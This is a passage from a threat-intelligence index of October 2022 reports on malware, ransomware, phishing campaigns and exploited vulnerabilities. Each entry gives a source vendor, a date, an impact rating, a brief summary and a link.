Summary:: Trustwave lab discovered a rise of in threats packaged in password-protected archives with about 96% of these being spammed by the Emotet Botnet. The team also noticed an interesting attachment in this spam campaign. Disguised as an invoice, the attachment in either ZIP or ISO format, contained a nested self-extracting (SFX) archive.

Source: https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/archive-sidestepping-self-unlocking-password-protected-rar/

Intel Source:: TrendMicro

Intel Name:: Qakbot_evolves_intrusion_by_leveraging_valid_code_signing

Date of Scan:: 2022-10-31

Impact:: LOW

Summary:: Researchers from TrendMicro extensively researched Qakbot evolving into more intrusive malware leveraging valid code signing through excel macros and .dll files. Qakbot has been seen enumerating and dumping certificates and private keys since July.

Source: https://www.trendmicro.com/en_us/research/22/j/where-is-the-origin-qakbot-uses-valid-code-signing-.html

Intel Source:: Securelist

Intel Name:: The_Growth_of_LODEINFO_backdoor_shellcode

Date of Scan:: 2022-10-31

Impact:: LOW

Summary:: Securelist researchers have identified that LODEINFO shellcode was regularly updated for use with each infection vector. The developer of LODEINFO v0.5.6 has implemented three new backdoor commands that enhance evasion techniques for certain security products.

Source: https://securelist.com/apt10-tracking-down-lodeinfo-2022-part-ii/107745/

Intel Source:: Microsoft

Intel Name:: The_Raspberry_Robin_worm_recent_activity

Date of Scan:: 2022-10-31

Impact:: LOW

Summary:: The researchers from Microsoft has noted recent activity for the Raspberry Robin worm which links to other malware families and alternate infection methods beyond its original USB drive spread. These infections are taking to the follow-on hands-on-keyboard attacks and human-operated ransomware activity. Microsoft monitoring of Raspberry Robin activity also shows it is very active operation: Microsoft Defender for Endpoint data indicates that nearly 3,000 devices in almost 1,000 organizations have seen at least one Raspberry Robin payload-related alert in the last 30 days.

Source: https://www.microsoft.com/en-us/security/blog/2022/10/27/raspberry-robin-worm-part-of-larger-ecosystem-facilitating-pre-ransomware-activity/

Intel Source:: ASEC

Intel Name:: AgentTesla_Being_Distributed_via_VBS

Date of Scan:: 2022-10-31

Impact:: LOW

Summary:: The ASEC analysis team has recently identified that AgentTesla is being distributed through malicious VBS. The script file has multiple codes that have been obfuscated multiple times. AgentTesla has been found to be distributed last May through a Windows Help file (*.chm), and it seems that its distribution method is continuously changing.

Source: https://asec.ahnlab.com/en/40890/

Intel Source:: TrendMicro

Intel Name:: A_rise_of_BlackCat_ransomware

Date of Scan:: 2022-10-31

Impact:: MEDIUM

Summary:: The BlackCat ransomware recently was very successful in the attacks on big-profile companies and it uses the triple extortion to exposing exfiltrated data. Plus ransomware actors that use triple extortion threaten to launch distributed denial-of-service (DDoS) attacks on their victims’ infrastructure to coerce them to pay the ransom.

Source: https://www.trendmicro.com/vinfo/us/security/news/ransomware-spotlight/ransomware-spotlight-blackcat

Intel Source:: ASEC

Intel Name:: Lazarus_Attack_Group_Disabling_Anti-Malware_Programs_With_the_BYOVD_Technique

Date of Scan:: 2022-10-31

Impact:: MEDIUM

Summary:: ASEC researchers have identified the Malware Infection by the Lazarus Attack Group Disabling Anti-Malware Programs With the BYOVD Technique

Source: https://asec.ahnlab.com/en/40830/

Intel Source:: Fortinet

Intel Name:: Warzone_RAT_Delivering_via_Fake_Hungarian_Government_Email

Date of Scan:: 2022-10-28

Impact:: MEDIUM

Summary:: Researchers from FortiGuard have discovered an email pretending to come from the Hungarian government. It includes an attachment that is a zipped executable that, upon execution, extracts the Warzone RAT to memory and runs it.

Source: https://www.fortinet.com/blog/threat-research/fake-hungarian-government-email-drops-warzone-rat?&web_view=true

Intel Source:: Medium

Intel Name:: The_update_of_Brute_Ratel_decryption

Date of Scan:: 2022-10-28

Impact:: LOW

Summary:: The developer released his notes with the addition of a change to a dynamic key instead of the hardcoded key everyone refers to. The hardcoded key is still used and exists for decrypting some of the strings on board.

Source: https://medium.com/walmartglobaltech/brute-ratel-config-decoding-update-7820455022cb

Intel Source:: ASEC

Intel Name:: Qakbot_Malware_Spreading_Rapidly_in_Korea

Date of Scan:: 2022-10-27

Impact:: LOW

Summary:: ASEC researchers have identified the Qakbot malware is being distributed to Korean users. It is using ISO files, which is similar to the previous version, but a process to bypass behavior detection was added.

Source: https://asec.ahnlab.com/en/40682/

Intel Source:: ASEC

Intel Name:: CoinMiner_Leveraging_Vulnerable_Apache_Tomcat_Web_Server

Date of Scan:: 2022-10-27

Impact:: LOW

Summary:: Researchers from ASEC have identified the attacks that are targeting vulnerable Apache Tomcat web servers.

Source: https://asec.ahnlab.com/en/40673/

Intel Source:: ASEC

Intel Name:: FormBook_InfoStealer_Being_Distributing_as_DotNet

Date of Scan:: 2022-10-27

Impact:: LOW

Summary:: ASEC researchers have identified FormBook malware that is downloaded to the system and executed while the user was using a web browser. It is an info-stealer that aims to steal the user’s web browser login information, keyboard input, clipboard, and screenshots.

Source: https://asec.ahnlab.com/en/40663/

Intel Source:: 360Netlab

Intel Name:: Fodcha_Botnet_is_Back_With_New_Version

Date of Scan:: 2022-10-27

Impact:: LOW

Summary:: Researchers from 360Netlab have observed that Fodcha botnet updated with new version and in it the hacker redesigned the communication protocol, and started to use xxtea and chacha20 algorithms to encrypt sensitive resources and network communication to avoid detection at the file & traffic level.

Source: https://blog.netlab.360.com/ddosmonster_the_return_of__fodcha_cn/

Intel Source:: ISC.SANS

Intel Name:: C2_Communications_Through_outlook

Date of Scan:: 2022-10-27

Impact:: LOW

Summary:: Researchers from SANS have identified a malicious Python script that exchanges information with its C2 server through emails.

Source: https://isc.sans.edu/diary/C2+Communications+Through+outlookcom/29180/

Intel Source:: ASEC

Intel Name:: Deep_Analysis_of_Attack_Techniques_and_Cases_Using_RDP

Date of Scan:: 2022-10-26

Impact:: LOW

Summary:: Researchers from ASEC have analyzed the cases of RDP (Remote Desktop Protocol) attacks using techniques and cases. It is commonly used in most attacks, and this is because it is useful for initial compromise or lateral movement in comparison to remote control tools that require additional installation processes.

Source: https://asec.ahnlab.com/en/40394/

Intel Source:: TrendMicro

Intel Name:: LV_Ransomware_Leveraging_ProxyShell_to_Attack

Date of Scan:: 2022-10-26

Impact:: LOW

Summary:: Researchers from Trend Micro have identified ransomware as a service (RaaS) named LV Ransomware which is exploiting ProxyShell in an attack on a Jordan-based company.

Source: https://www.trendmicro.com/en_us/research/22/j/lv-ransomware-exploits-proxyshell-in-attack.html

Intel Source:: Checkpoint

Intel Name:: Scammers_Impersonating_Multiple_Brands_for_Phishing_Attack

Date of Scan:: 2022-10-26

Impact:: LOW

Summary:: Researchers from Checkpoint have analyzed the phishing campaigns and found top brands which are most frequently imitated by criminals in their attempts to steal individuals' personal information or payment credentials during July, August, and September.

Source: https://blog.checkpoint.com/2022/10/24/online-shoppers-beware-scammers-most-likely-to-impersonate-dhl/

Intel Source:: ASEC

Intel Name:: Evolution_of_Magniber_Ransomware

Date of Scan:: 2022-10-26

Impact:: LOW

Summary:: Researchers from ASEC have analyzed the Magniber ransomware files distributed in each time period. In the month of September alone, there have been format changes up to four times (cpl -> jse -> js -> wsf -> msi). Frequent changes were also made to the method of injection, UAC bypassing and deactivation of the Windows 10 recovery environment, for the purpose of bypassing detection.

Source: https://asec.ahnlab.com/en/40422/

Intel Source:: ASEC

Intel Name:: A_distribution_of_Amadey_Bot_malware

Date of Scan:: 2022-10-26

Impact:: LOW

Summary:: The Korean Internet & Security Agency shared a notice “Advising Caution on Cyber Attacks Exploiting the Kakao Service Malfunction Issue’, with the malware details about it pretending it as a KakaoTalk installation file (KakaoTalkUpdate.zip etc.) and being distributed by email. The ASEC analysis team got the relevant samples and discovered that it has same filename and icon as the actual messenger program, which prompts ordinary users to launch it.

Source: https://asec.ahnlab.com/en/40483/

Intel Source:: Guardio

Intel Name:: Malicious_Extension_Dormant_Colors

Date of Scan:: 2022-10-26

Impact:: LOW

Summary:: Researchers from Guardio Security have identified the Dormant Colors extension malicious campaign with millions of active installations worldwide. There are at least 30 variants of this extension part of a campaign for both Chrome and Edge, available freely in the relevant stores.

Source: https://guardiosecurity.medium.com/dormant-colors-live-campaign-with-over-1m-data-stealing-extensions-installed-9a9a459b5849

Intel Source:: PaloAlto

Intel Name:: Web_Skimmers_Still_Active

Date of Scan:: 2022-10-25

Impact:: LOW

Summary:: PaloAlto researchers have analyzed the latest trends of web threats such as host and landing URLs, including where they are hosted, what categories they belong to, and which malware families pose the most threats.

Source: https://unit42.paloaltonetworks.com/web-threat-trends-web-skimmer/

Intel Source:: CISA

Intel Name:: US_Government_warns_of_Daixin_Team_Targeting_Health_sector_with_Ransomware

Date of Scan:: 2022-10-25

Impact:: MEDIUM

Summary:: The Daixin Team is a ransomware and data extortion group that has targeted the HPH sector with ransomware and data extortion operations since at least June 2022. Since then, Daixin Team cybercrime actors have caused ransomware incidents at multiple HPH Sector organizations.

Source: https://www.cisa.gov/uscert/ncas/alerts/aa22-294a

Intel Source:: ISC.SANS

Intel Name:: Analysis_of_Malicious_RTF_Files

Date of Scan:: 2022-10-25

Impact:: LOW

Summary:: Researchers from SANS have analyzed malicious RTF files.

Source: https://isc.sans.edu/diary/rtfdumps+Find+Option/29174/

Intel Source:: CERT-UA

Intel Name:: Cuba_Ransomware_Targeting_Ukrainian_Government_Agencies

Date of Scan:: 2022-10-25

Impact:: LOW

Summary:: CERT-UA researchers have issued an alert about potential Cuba Ransomware attacks against critical networks in the country. They observed a new wave of phishing emails that impersonated the Press Service of the General Staff of the Armed Forces of Ukraine, urging recipients to click on an embedded link.

Source: https://cert.gov.ua/article/2394117 https://blogs.blackberry.com/en/2022/10/unattributed-romcom-threat-actor-spoofing-popular-apps-now-hits-ukrainian-militaries

Intel Source:: Zscaler

Intel Name:: SideWinder_APT_Using_New_WarHawk_Backdoor

Date of Scan:: 2022-10-25

Impact:: LOW

Summary:: Researchers from Zscaler have identified that SideWinder APT uses WarHawk malware to Target Entities in Pakistan.

Source: https://www.zscaler.com/blogs/security-research/warhawk-new-backdoor-arsenal-sidewinder-apt-group-0

Intel Source:: Cyble

Intel Name:: Infostealer_Distributing_Via_Free_and_Cracked_Software

Date of Scan:: 2022-10-24

Impact:: LOW

Summary:: Researchers from Cyble have identified the new Temp stealer spreading via free and cracked software.

Source: https://blog.cyble.com/2022/10/20/infostealer-distributed-using-bundled-installer/

Intel Source:: ASEC

Intel Name:: Various_Remote_Control_Tools_attacks

Date of Scan:: 2022-10-24

Impact:: LOW

Summary:: Researchers from ASEC discovered multiple attack campaigns abusing various remote control tools to steal information, install backdoors and deploy malwares.

Source: https://asec.ahnlab.com/en/40263/

Intel Source:: Fortinet

Intel Name:: The_multiple_malware_attacks_on_VMware_Vulnerability

Date of Scan:: 2022-10-21

Impact:: MEDIUM

Summary:: Researchers from Fortinet discovered multiple malware campaigns leveraging CVE-2022-22954 to deploy Mirai, RAR1ransom, GuardMiner.

Source: https://www.fortinet.com/blog/threat-research/multiple-malware-campaigns-target-vmware-vulnerability

Intel Source:: Wordsfence

Intel Name:: Hackers_Exploiting_Text4Shell_Vulnerability

Date of Scan:: 2022-10-21

Impact:: HIGH

Summary:: Researchers from Wordfence have started detecting exploitation attempts targeting the newly disclosed flaw in Apache Commons Text on October 18, 2022. The vulnerability, tracked as CVE-2022-42889 aka Text4Shell, has been assigned a severity ranking of 9.8 out of a possible 10.0 on the CVSS scale and affects versions 1.5 through 1.9 of the library.

Source: https://www.wordfence.com/blog/2022/10/threat-advisory-monitoring-cve-2022-42889-text4shell-exploit-attempts/

Intel Source:: Wordsfence

Intel Name:: Zero_Day_Vulnerabilities_in_Microsoft_Exchange_Server

Date of Scan:: 2022-10-21

Impact:: MEDIUM

Summary:: Wordfence researchers have observed exploit attempts targeting two zero-day vulnerabilities in Microsoft Exchange Server tracked as CVE-2022-41040 and CVE-2022-41082. A total of 1,658,281 exploit attempts were observed across their network of 4 million protected websites due to these vulnerabilities.

Source: https://www.wordfence.com/blog/2022/10/two-weeks-of-monitoring-proxynotshell-threat-activity/

Intel Source:: Checkpoint

Intel Name:: Black_Basta_and_the_Unnoticed_Delivery

Date of Scan:: 2022-10-20

Impact:: MEDIUM

Summary:: Researchers from Checkpoint have observed in a recent Black Basta incident spotted by Incident Response Team, the operators behind this ransomware also have an impressive organizational structure.

Source: https://research.checkpoint.com/2022/black-basta-and-the-unnoticed-delivery/

Intel Source:: Mandiant

Intel Name:: A_New_Variant_of_URSNIF_Malware

Date of Scan:: 2022-10-20

Impact:: LOW

Summary:: Researchers from Mandiant have observed URSNIF malware shifting its focus to Ransomware and Data Theft from Banking fraud.

Source: https://www.mandiant.com/resources/blog/rm3-ldr4-ursnif-banking-fraud

Intel Source:: TrendMicro

Intel Name:: WatchDog_Hackers_Possibly_Impersonating_TeamTNT

Date of Scan:: 2022-10-20

Impact:: LOW

Summary:: Researchers at TrendMicro have found that the attack patterns are similar to the arsenal used by TeamTNT, but that it is likely a different cryptocurrency mining group, known as WatchDog, is deploying the code.

Source: https://www.trendmicro.com/en_us/research/22/j/teamtnt-returns-or-does-it.html

Intel Source:: SafeBreach

Intel Name:: New_PowerShell_Backdoor_Fully_Undetectable

Date of Scan:: 2022-10-19

Impact:: MEDIUM

Summary:: Using a novel method of disguising itself as part of the Windows update process, researchers from SafeBreach have detected a new fully undetectable (FUD) PowerShell backdoor.

Source: https://www.safebreach.com/resources/blog/safebreach-labs-researchers-uncover-new-fully-undetectable-powershell-backdoor/

Intel Source:: WeliveSecurity

Intel Name:: LAZARUS_attacks_using_spear_phishing_emails

Date of Scan:: 2022-10-19

Impact:: LOW

Summary:: The Lazarus campaign targeted an aerospace company employee in the Netherlands and a political journalist in Belgium. The campaign started with spear phishing emails. These came in the form of fake Amazon emails. The main goal of the attackers was to steal data.

Source: https://www.welivesecurity.com/deutsch/2022/10/18/lazarus-greift-die-niederlande-und-belgien-an/

Intel Source:: Quick Heal

Intel Name:: Diving_Deep_into_New_64_Bit_Emotet_Modules

Date of Scan:: 2022-10-18

Impact:: LOW

Summary:: Researchers from QuickHeal have analyzed the new 64 bit Emotet modules and their differences from the previous cosmetic versions.

Source: https://blogs.quickheal.com/a-deep-dive-into-new-64-bit-emotet-modules/

Intel Source:: STR

Intel Name:: Potential_C2_Seeder_Queries_18102022

Date of Scan:: 2022-10-18

Impact:: MEDIUM

Summary:: This research is part of Securonix Threat Labs - Threat Research Team

Source: https://github.com/str-int-repo/str-seeder-behavior-queries

Intel Source:: Fortinet

Intel Name:: A_Latest_Edition_of_The_New_Royal_Ransomware

Date of Scan:: 2022-10-18

Impact:: MEDIUM

Summary:: FortiGuard Labs got a data on a new variant that gaining an interest in the OSINT community. Royal is a reasonably new operation, having been around since at least the start of 2022. The target of this malware is Microsoft Windows platforms and Windows users. The aim is to gain access to a victim’s environment, encrypt their data, and extort a ransom to return access to any files touched.

Source: https://www.fortinet.com/blog/threat-research/ransomware-roundup-royal-ransomware

Intel Source:: Symantec

Intel Name:: CuckooBees_Campaign_Targeting_Organizations_in_Hong_Kong

Date of Scan:: 2022-10-18

Impact:: LOW

Summary:: According to Symantec researchers, CuckooBee is continuing to target Hong Kong-based organizations. As part of this ongoing campaign, Spyder Loader (Trojan.Spyload) malware was installed on the networks of victims.

Source: https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/spyder-loader-cuckoobees-hong-kong

Intel Source:: ISC.SANS

Intel Name:: Python_Obfuscation_for_Dummies

Date of Scan:: 2022-10-18

Impact:: LOW

Summary:: SANS researchers analyzed several malicious Python scripts with the same appearance and end strings. Due to the obfuscation technique, we are unable to figure out what the script is used for without executing it in a sandbox.

Source: https://isc.sans.edu/diary/rss/29160

Intel Source:: Cloudsek

Intel Name:: Diving_Deep_into_BlueSky_Ransomware

Date of Scan:: 2022-10-17

Impact:: LOW

Summary:: CloudSEK researchers have done a deep analysis of BlueSky Ransomware that covers the technical aspects: Procedure for privilege escalation, Persistence, Encryption mechanism, and Evasion techniques.

Source: https://cloudsek.com/technical-analysis-of-bluesky-ransomware/?utm_source=rss&utm_medium=rss&utm_campaign=technical-analysis-of-bluesky-ransomware

Intel Source:: Splunk

Intel Name:: A_new_adversary_simulation_tool_Brute_Ratel_C4_(BRC4)

Date of Scan:: 2022-10-17

Impact:: LOW

Summary:: The Splunk Threat Research Team (STRT) shared their reserach with the capture of Brute Ratel Badgers (agents) to create a Yara rule and help to identify more on VirusTotal. Brute Ratel tool is growing in the ranks of popularity among red teamers and most recently adversaries. Plus, the reserachers reversed a sample to understand its functions and analyzed it to help defenders identify behaviors related to Brute Ratel.

Source: https://www.splunk.com/en_us/blog/security/deliver-a-strike-by-reversing-a-badger-brute-ratel-detection-and-analysis.html

Intel Source:: Palo Alto

Intel Name:: The_Connection_Between_REvil_and_Ransom_Cartel_Ransomware

Date of Scan:: 2022-10-17

Impact:: LOW

Summary:: Researchers from Palo Alto have done a deep analysis of Ransom Cartel ransomware, as well as our assessment of the possible connections between REvil and Ransom Cartel ransomware.

Source: https://unit42.paloaltonetworks.com/ransom-cartel-ransomware/?web_view=true

Intel Source:: VMware

Intel Name:: LockBit_3.0_is_in_the_spotlight_again

Date of Scan:: 2022-10-17

Impact:: MEDIUM

Summary:: VMware searchers observed LockBit continues its rise to the top of the ransomware ecosystem and the most leading ransomware strain. It was announced that the builder for the ransomware was leaked by @ali_qushji and available for download from GitHub. This leaked source allows for complete and unhindered analysis, but meaning also that many new groups are emerging, using the same or modified versions of LockBit 3.0 originating from this builder.

Source: https://blogs.vmware.com/security/2022/10/lockbit-3-0-also-known-as-lockbit-black.html

Intel Source:: AT&T

Intel Name:: SocGholish_Drive_by_Compromise

Date of Scan:: 2022-10-17

Impact:: LOW

Summary:: AT&T researchers have analyzed an alert related to SocGholish that is providing fake software updates.

Source: https://cybersecurity.att.com/blogs/security-essentials/stories-from-the-soc-feeling-so-foolish-socgholish-drive-by-compromise

Intel Source:: ISC.SANS

Intel Name:: COVID_Phishing_Campaign

Date of Scan:: 2022-10-17

Impact:: LOW

Summary:: Researchers from SANS have analyzed phishing emails about Covid for all suppliers to declare their vaccination status, but the date is almost 1 year old.

Source: https://isc.sans.edu/diary/rss/29150

Intel Source:: ISC.SANS

Intel Name:: A_new_Powershell_script_dropps_a_malware

Date of Scan:: 2022-10-17

Impact:: LOW

Summary:: Researchers from SANS have hunted and found a malicious Powershell script that drops a malware on the victim's computer. It is not new one. It is called "autopowershell.ps1". This malware tries to reduce at the minimum interactions with the file system. But, to achieve persistence, it must write something on the disk. Most of the time, it's done through registry keys.

Source: https://isc.sans.edu/diary/Fileless+Powershell+Dropper/29156/

Intel Source:: Palo Alto

Intel Name:: A_rise_of_threats_from_newly_observed_domains

Date of Scan:: 2022-10-17

Impact:: LOW

Summary:: Last year, Palo Alto Networks created a proactive detector which recognized malicious domains at that time and identifyed them before they are starting their malicious activities. At Palo Alto Networks detector extract NODs from passive DNS and proactively detect potential cybercriminal activities among them. The system scans and discovered newly registered domains (NRDs) and detected their potential network abuses.

Source: https://unit42.paloaltonetworks.com/malicious-newly-observed-domains/

Intel Source:: Microsoft

Intel Name:: Prestige_Ransomware_Targeting_Organizations_in_Ukraine_and_Poland

Date of Scan:: 2022-10-17

Impact:: LOW

Summary:: Researchers from Microsoft have identified new Prestige ransomware that is being used in attacks aimed at transportation and logistics organizations in Ukraine and Poland.

Source: https://www.microsoft.com/security/blog/2022/10/14/new-prestige-ransomware-impacts-organizations-in-ukraine-and-poland/

Intel Source:: Blackberry

Intel Name:: BianLian_Ransomware_encrypts_withan_immediate_speed

Date of Scan:: 2022-10-14

Impact:: MEDIUM

Summary:: The reserachers from Cyble observed BianLian ransomware raises the severity level of encrypting files with exceptional speed. Threat actors created the new BianLian ransomware version in the Go programming language (aka Golang) for a variety of reasons, particularly its robust support for concurrency which gives them the ability for various malicious functions to run independently of each other, which speeds up attack.

Source: https://blogs.blackberry.com/en/2022/10/bianlian-ransomware-encrypts-files-in-the-blink-of-an-eye

Intel Source:: Cyble

Intel Name:: A_spreading_of_RedLine_Stealer

Date of Scan:: 2022-10-14

Impact:: Medium

Summary:: Cyble Research team uncovered a phishing site that pretended like a genuine “Convertio” online tool website that converts files into different file formats, including documents, images, spreadsheets, eBooks, archives, presentations, audio, video, etc. The phishing website is well-designed and appears similar to the legitimate Convertio website.

Source: https://blog.cyble.com/2022/10/14/online-file-converter-phishing-page-spreads-redline-stealer/

Intel Source:: Palo Alto

Intel Name:: Ransom_Cartel_ransomware_performance_overlaps_with_REvil_ransomware

Date of Scan:: 2022-10-14

Impact:: MEDIUM

Summary:: Palo Alto shared their analysis of Ransom Cartel ransomware. Unit 42 has observed Ransom Cartel encrypting both Windows and Linux VMWare ESXi servers in attacks on corporate networks. Ransom Cartel uses double extortion and some of the same TTPs were observed during ransomware attacks, this type of ransomware uses less common tools – DonPAPI.

Source: https://unit42.paloaltonetworks.com/ransom-cartel-ransomware/

Intel Source:: Zscaler

Intel Name:: Ducktail_infostealer_came_back_again

Date of Scan:: 2022-10-14

Impact:: LOW

Summary:: The Zscaler ThreatLabz research team has come across an new campaign of Ducktail Infostealer with a new PHP version which is vigorously being distributed by mimicking to be a free/cracked application installer for a variety of applications including games, Microsoft Office applications, Telegram, and others.

Source: https://www.zscaler.com/blogs/security-research/new-php-variant-ducktail-infostealer-targeting-facebook-business-accounts

Intel Source:: Uptycs

Intel Name:: AgentTesla_Malware_Distributing_via_WSHRAT_Malware

Date of Scan:: 2022-10-14

Impact:: LOW

Summary:: Uptycs researchers have identified a new Agent Tesla malware attack campaign and observed that the threat actors are now trying to drop Agent Tesla malware via WSHRAT malware.

Source: https://www.uptycs.com/blog/wshrat-acting-as-a-dropper-for-agent-tesla

Intel Source:: Cyble

Intel Name:: InfoStealer_Spreading_via_AnyDesk_Phishing_Site

Date of Scan:: 2022-10-14

Impact:: LOW

Summary:: Researchers from Cyble have identified a phishing site, that is impersonating a genuine AnyDesk website. The initial infection starts when the user clicks on the “Downloads” button present in the phishing site, which downloads a malware named “Anydesk.exe” file from the remote server.

Source: https://blog.cyble.com/2022/10/13/mitsu-stealer-distributed-via-anydesk-phishing-site/

Intel Source:: Crowdstrike

Intel Name:: The_examination_of_Wiper_Malware_Part_4

Date of Scan:: 2022-10-14

Impact:: MEDIUM

Summary:: Researchers from CrowdStrike have covered some of the rarely used “helper” techniques implemented by wipers, which achieve secondary goals or facilitate a smaller portion of the wiping process.

Source: https://www.crowdstrike.com/blog/the-anatomy-of-wiper-malware-part-4/

Intel Source:: ISC.SANS

Intel Name:: Deep_Analysis_of_QBot_HTML_File

Date of Scan:: 2022-10-14

Impact:: LOW

Summary:: Researchers from SANS have analyzed a malicious QBot HTML file that contains BASE64 images with malware.

Source: https://isc.sans.edu/diary/Analysis+of+a+Malicious+HTML+File+QBot/29146/

Intel Source:: Wordsfence

Intel Name:: A_critical_authentication_bypass_vulnerability_CVE_2022_40684

Date of Scan:: 2022-10-14

Impact:: High

Summary:: Wordfence Threat Intelligence team recorded today several exploit attempts and requests originating from the malicious IP addresses. This exploit attempts targeting CVE-2022-40684 on network. CVE-2022-40684 is a critical authentication bypass vulnerability in the administrative interface of Fortinet’s FortiGate firewalls, FortiProxy web proxies, and FortiSwitch Manager, and is being actively exploited in the wild.

Source: https://www.wordfence.com/blog/2022/10/threat-advisory-cve-2022-40684-fortinet-appliance-auth-bypass/

Intel Source:: Cyfirma

Intel Name:: Prynt_malware_injection_techniques

Date of Scan:: 2022-10-14

Impact:: LOW

Summary:: CYFIRMA Research team analysed an infostealer “Prynt” sample and that sample was found to be written in C/C++ and is a 32-bit console binary. Infostealer “Prynt” has the capability to steal system information from infected systems, which includes files from the targeted directories and credentials from web browsers.

Source: https://www.cyfirma.com/outofband/infostealer-prynt-malware-a-deep-dive-into-its-process-injection-technique/

Intel Source:: ASEC

Intel Name:: Various_malicious_remote_control_tools

Date of Scan:: 2022-10-13

Impact:: LOW

Summary:: Researchers from ASEC have identified various malicious remote control tools that are generally used by various users are used. This allows attackers to bypass the security product's diagnosis and take control of the infected system in a GUI environment.

Source: https://asec.ahnlab.com/ko/39761/

Intel Source:: ASEC

Intel Name:: GuLoader_malware_disguised_as_Word

Date of Scan:: 2022-10-13

Impact:: LOW

Summary:: ASEC researchers have discovered that the GuLoader malware is being distributed to domestic corporate users.

Source: https://asec.ahnlab.com/ko/39878/

Intel Source:: SentinelOne

Intel Name:: WIP19_Group_Targeting_Telecommunication_and_IT_Industries

Date of Scan:: 2022-10-13

Impact:: LOW

Summary:: SentinelOne researchers have tracked a new Chinese-speaking threat group known as WIP19 that is targeting telecommunications and IT service providers in the Middle East and Asia.

Source: https://www.sentinelone.com/labs/wip19-espionage-new-chinese-apt-targets-it-service-providers-and-telcos-with-signed-malware/

Intel Source:: HP Threat Research

Intel Name:: Magniber_Ransomware_continues_targeting_Home_Users_with_Fake_Software_Updates

Date of Scan:: 2022-10-13

Impact:: MEDIUM

Summary:: Researchers from HP shared their analysis of a Magniber ransomware campaign that was going since September and targeted home users by masquerading as software updates. The attackers used the evade detection techniques, such as running the ransomware in memory, bypassing User Account Control (UAC) in Windows, and bypassing detection techniques.

Source: https://threatresearch.ext.hp.com/magniber-ransomware-switches-to-javascript-targeting-home-users-with-fake-software-updates/

Intel Source:: ASEC

Intel Name:: Top_malware_statistics_for_last_two_weeks

Date of Scan:: 2022-10-13

Impact:: MEDIUM

Summary:: The ASEC team did the analyse and collected statistics about Top 5 malwares from September 26th, 2022 (Monday) to October 2nd, 2022 (Sunday).

Source: https://asec.ahnlab.com/en/39627/

Intel Source:: Cisco Talos

Intel Name:: New_Attack_Technique_Leveraging_Alchimist_and_Insekt_Malware

Date of Scan:: 2022-10-13

Impact:: MEDIUM

Summary:: Researchers from Cisco have discovered a new attack framework, including a command and control (C2) tool called "Alchimist" and a new malware "Insekt" written in GoLang targetting windows, Mac, and Linux in the wild.

Source: https://blog.talosintelligence.com/2022/10/alchimist-offensive-framework.html

Intel Source:: Cyble

Intel Name:: A_new_ongoing_tech_support_scam

Date of Scan:: 2022-10-13

Impact:: LOW

Summary:: Cyble Research & Intelligence Labs reserachers identified a new ongoing tech support scam where the Threat Actor has developed various phishing websites that impersonated to be part of of Microsoft support sites that show a fake Windows defender alert.

Source: https://blog.cyble.com/2022/10/11/massive-tech-support-scam-exposed/

Intel Source:: Symantec

Intel Name:: Budworm_Hackers_Targeting_US_Organization

Date of Scan:: 2022-10-13

Impact:: LOW

Summary:: Researchers from Symantec Threat Hunter team have identified APT group named Budworm targeting an unnamed U.S. state legislature for the first time.

Source: https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/budworm-espionage-us-state

Intel Source:: SentinelOne

Intel Name:: 8220_Gang_continues_to_target_misconfigured_cloud_workloads

Date of Scan:: 2022-10-13

Impact:: MEDIUM

Summary:: SentinelOne noted that 8220 Gang had expanded its cloud service botnet and the group has rotated its attack infrastructure and continued to absorb compromised hosts into its botnet and to distribute cryptocurrency mining malware. 8220 Gang identifies targets via scanning for misconfigured or vulnerable hosts on the public internet.

Source: https://www.sentinelone.com/blog/8220-gang-cloud-botnet-targets-misconfigured-cloud-workloads/

Intel Source:: Fortinet

Intel Name:: MS_Excel_File_Delivering_Multi_Stage_Cobalt_Strike_Loader

Date of Scan:: 2022-10-12

Impact:: LOW

Summary:: FortiGuard Labs researchers have discovered a malicious Excel document masquerading as a salary calculation tool for Ukrainian troops. It executes evasive multi-stage loaders, eventually resulting in the victim's device being infected with Cobalt Strike Beacon malware.

Source: https://www.fortinet.com/blog/threat-research/ukrainian-excel-file-delivers-multi-stage-cobalt-strike-loader?&web_view=true

Intel Source:: ASEC

Intel Name:: Qakbot_Distribution_Method_Changed_from_Excel_Macro_to_ISO_Files

Date of Scan:: 2022-10-12

Impact:: LOW

Summary:: ASEC researchers have identified that Qakbot, an online banking malware, has changed its distribution method from Excel 4.0 Macro to ISO files.

Source: https://asec.ahnlab.com/en/39537/

Intel Source:: Mandiant

Intel Name:: Caffeine_Service_Allows_Anyone_Launch_Microsoft_365_Phishing_Attacks

Date of Scan:: 2022-10-12

Impact:: LOW

Summary:: Researchers from Mandiant have discovered and tested the phishing-as-a-service (PhaaS) platform named 'Caffeine' service thoroughly. Post investigation, a large-scale phishing campaign ran through the service, targeting one of Mandiant's clients to steal Microsoft 365 account credentials.

Source: https://www.mandiant.com/resources/blog/caffeine-phishing-service-platform

Intel Source:: ASEC

Intel Name:: GlobeImposter_Ransomware_Targeting_Vulnerable_MS_SQL_Servers

Date of Scan:: 2022-10-12

Impact:: LOW

Summary:: Researchers from ASEC have identified that the GlobeImposter ransomware, which targets vulnerable MS-SQL servers, is being distributed in Korea.

Source: https://asec.ahnlab.com/en/39706/

Intel Source:: TrendMicro

Intel Name:: Black_Basta_Ransomware_Using_QAKBOT_Brute_Ratel_and_Cobalt_Strike

Date of Scan:: 2022-10-12

Impact:: MEDIUM

Summary:: Researchers from Trendmicro have analyzed QAKBOT related cases that is leading to a Brute Ratel C4 and Cobalt Strike payload and that can be attributed to the threat actors behind the Black Basta ransomware.

Source: https://www.trendmicro.com/en_us/research/22/j/black-basta-infiltrates-networks-via-qakbot-brute-ratel-and-coba.html

Intel Source:: ASEC

Intel Name:: Lazarus_Group_Leveraging_DLL_Side-Loading_Technique

Date of Scan:: 2022-10-12

Impact:: MEDIUM

Summary:: ASEC researchers have discovered that the Lazarus group hackers using the DLL Side-Loading attack technique (T1574.002) by abusing legitimate applications in the initial compromise stage to achieve the next stage of their attack process.

Source: https://asec.ahnlab.com/en/39828/

Intel Source:: X-Junior

Intel Name:: TheSnakeKeyloggermalwareanalyses

Date of Scan:: 2022-10-11

Impact:: LOW

Summary:: The researcher from X-Junior provided his deep analyses in his post about Snake Keylogger. Snake Keylogger is a malware developed using .NET anf its pupose is on stealing sensitive information from a victim’s device, saved credentials, the victim’s keystrokes, screenshots of the victim’s screen, and clipboard data.

Source: https://x-junior.github.io/malware%20analysis/2022/06/24/Snakekeylogger.html#introduction
